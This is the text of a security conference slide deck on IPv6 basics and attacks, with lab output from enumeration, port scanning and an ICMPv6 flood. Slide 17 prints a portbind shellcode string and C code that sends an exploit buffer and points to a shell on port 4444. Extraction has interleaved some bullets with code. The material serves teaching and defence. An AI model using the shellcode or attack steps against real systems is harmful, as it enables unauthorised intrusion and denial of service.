IPv6 Fundamentals & Securities

1. IPv6 Fundamentals & Securities Don Anto IPSECS.COM

2. Who? • Don Anto • Information security manager • JNCIP-SEC, GSEC, GCIH, GCIA, GPEN, TOGAF • A dead security researcher • Involve in security field for almost 10 years • Genius evil thinker; professional troublemaker • @djantoxz

3. IPv6 - Why? • Analog to digital convergence (E.G: Voice over IP) • The use of virtualization (E.G: Cloud) • Embedded devices (Smart phone, RFID) networking • All increase the needs of unique IP Address • So, more IP Address spaces are required! • Finally, IPv4 Address Exhaustion

4. IPv6 - What? • The latest version of Internet Protocol (IP), and is intended to replace IPv4 • 128 bit IP Addressing, instead of 32 bit, to multiply IP address space • IPv4 = 232 (4.294.967.296) >< IPv6 2128 (3.4×1038) • Not using dot decimal anymore, otherwise hexadecimal with colon is used • E.G: • 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092 • 2001:470:0:64::2 • fe80::1

5. IPv6 Fundamentals Source: Fernando Gont Presentation • IPv6 header, 40 Bytes Fixed Length • Source address 16 bytes, destination address 16 bytes • 8 bytes for version, traffic class, flow label, payload length, next header, & hop limit

6. IPv6 Fundamentals • IPv6 Address Type: • Loopback • Unspecified • Multicast • Anycast • Local unicast • Global unicast • Subneting • Routing Source: Fernando Gont Presentation

7. v4 >< v6 Source: Fernando Gont Presentation

8. v4 to v6 • Dual-Stack system to support IPv4 & IPv6 concurrently • Tunneling mechanism to encapsulate IPv6 inside IPv4 • 6to4, 6in4, Teredo, ISATAP • Network Address Translation (NAT) • Network Address Translation – Protocol Translation (NAT-PT) • Network Address Translation – IPv6 IPv4 (NAT-64) • Free IPv6 Tunnel Broker?

9. Security Issues • Large space of IPv6 address (enumeration, scanning, managing) • The use of tunneling? The use of dual-stack networking? • Weakness in IPv6 itself? (protocol level vulnerabilities) • Weakness of Application ran on IPv6

10. Enumeration • Discovery through multicast address (FF02::1) ipv6lab ->./alive6 eth4 • Discovery through ICMPv6 Echo Request Alive: dead:beaf::3 • Discovery through DNS Query (A >< AAAA) Alive: dead:beaf::1 • Discovery through SNMP Query Found 2 systems alive • Google helps us to find IPv6 domains • The presence of IPAM may be help ipv6lab->host -t A www.jp.freebsd.org www.jp.freebsd.org has address 119.245.129.228 ipv6lab->host -t AAAA www.jp.freebsd.org www.jp.freebsd.org has IPv6 address 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092 ipv6lab->ping6 -I eth4 ff02::1 PING ff02::1(ff02::1) from fe80::a00:27ff:fe39:6f0a eth4: 56 data bytes 64 bytes from fe80::a00:27ff:fe39:6f0a: icmp_seq=1 ttl=64 time=0.034 ms 64 bytes from fe80::a00:27ff:fe96:da90: icmp_seq=1 ttl=64 time=1.70 ms (DUP!) 64 bytes from fe80::a00:27ff:fe6c:ea37: icmp_seq=1 ttl=64 time=2.58 ms (DUP!) ipv6lab->ip -6 neigh show fe80::a00:27ff:fe96:da90 dev eth4 lladdr 08:00:27:96:da:90 REACHABLE fe80::a00:27ff:fe6c:ea37 dev eth4 lladdr 08:00:27:6c:ea:37 REACHABLE

11. ipv6lab->nmap -6 -sV -PN -T4 dead:beaf::3 Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WIT Interesting ports on dead:beaf::3: Not shown: 999 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9 (protocol 2.0) Scanning ipv6lab->nmap -sV -PN -T4 192.168.137.103 Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WIT Interesting ports on 192.168.137.103: Not shown: 998 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp? 22/tcp open ssh OpenSSH 5.9 (protocol 2.0) MAC Address: 08:00:27:6C:EA:37 (Cadmus Computer Systems) v4 to v6 proxy is usually helpful E.G: Socat apt-get install socat • Port Scanning (Tools with IPv6 support) • Vulnerability Scanning (Tools with IPv6 support)

12. Perimeter Defense Bypass • Does Firewall protect both IPv4 and IPv6 network? • Does IDS/IPS protect both IPv4 and IPv6 network? • TEREDO tunneling can be used to bypass NAT and to compromise internal network • The use of dual stack and tunneling mandates the protection for IPv4 and IPv6

13. Perimeter Defense Bypass • IPv4 is well governed by firewall using NAT or policies • Poor firewall configuration is potentially used to bypass access using IPv6 network to DMZ • Even worse, someone may directly access the internal network from internet

14. Exploiting - Protocols • IPv6 also designed to increase security of IPv4, unfortunately there is no significant improvement • Some problems in IPv4 is still persistent in IPv6 • Man In The Middle Attack • Denial of Services Attack • More and more 

15. Man In The Middle • Spoofed ICMP Neighbor Advertisement (replacing ARP in v4) • Spoofed ICMP Router Advertisement • Spoofed ICMP Redirect or ICMP Toobig to implant routing • Rogue DHCPv6 Server (replacing DHCP server in v4) • More and more  Source Image: OWASP website Used to help packet sniffing

16. Denial of Services anto# ifstat -b eth0 • Traffic flooding with ICMPv6 RA, NA, NS, MLD, Smurfing Kbps in Kbps out 9851.48 1.08 • Prevent new IPv6 address with DAD 10244.34 0.95 • CPU Exhaustion with ICMPv6 NS and a lot of crypto stuff 10313.33 0.95 • Routing loop attack utilizes automatic tunneling 9165.56 0.95 • ICMP attack against TCP to tear down BGP session 9358.11 0.95 10165.01 0.95 9802.98 0.95 9353.34 0.95 anto# tcpdump -n -i eth0 dst host dead:beaf::3 20:39:48.442267 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 20:39:48.442290 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 20:39:48.442314 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 20:39:48.442337 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 20:39:48.442585 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 4700 packets captured 4884 packets received by filter 93 packets dropped by kernel

17. Exploiting - Apps char shellcode[] = /*Portbind @ 4444*/ "xd9xccxbdx59x34x55x97xd9x74x24xf4x5ax29xc9" • Buffer Overflow "xb1x17x31x6ax19x83xc2x04x03x6ax15xbbxc1x64" "x4cx68x69xd4x18x84xe4x3bxb6xfexaex76xc7x68" • Remote Format String "xd7xdbx9axc6xbax89x48x80x52x3fx31x2axcbx35" • Off-By-One "xc9x3bxeax20xd5x6axbbx3dx04xcfx29x58x9fx02" • Web App Attacks "x2dx14x79x2fx2ax98x06x1dx61x74x8ex40xc6xc8" • More Attacks?! "xf6x4fx49xbbxaex25x75xe4x9dx39xc0x6dxe6x51" "xfcxa2x65xc9x6ax92xebx60x05x65x08x22x8axfc" • There’s no big difference "x2ex72x27x32x30"; • Socket programming & shellcodes for(AI=AddrInfo;AI!=NULL;AI=AI->ai_next){ if((s=socket(AI->ai_family,AI->ai_socktype,AI->ai_protocol))<0){ v4 to v6 proxy is usually printf("can't create socketn"); exit(0); helpful E.G: Socat } apt-get install socat connect(s,AI->ai_addr,AI->ai_addrlen); send(s,buffer,len,0); printf("Check your shell on %s TCP port 4444n",argv[1]); }

18. DEMO

19. Discussion

20. Thank You

IPv6 Fundamentals & Securities

IPv6 Fundamentals & Securities

Recommended

More Related Content

What's hot

What's hot(20)

Viewers also liked

Viewers also liked(20)

Similar to IPv6 Fundamentals & Securities

Similar to IPv6 Fundamentals & Securities(20)

More from Don Anto

More from Don Anto(7)

IPv6 Fundamentals & Securities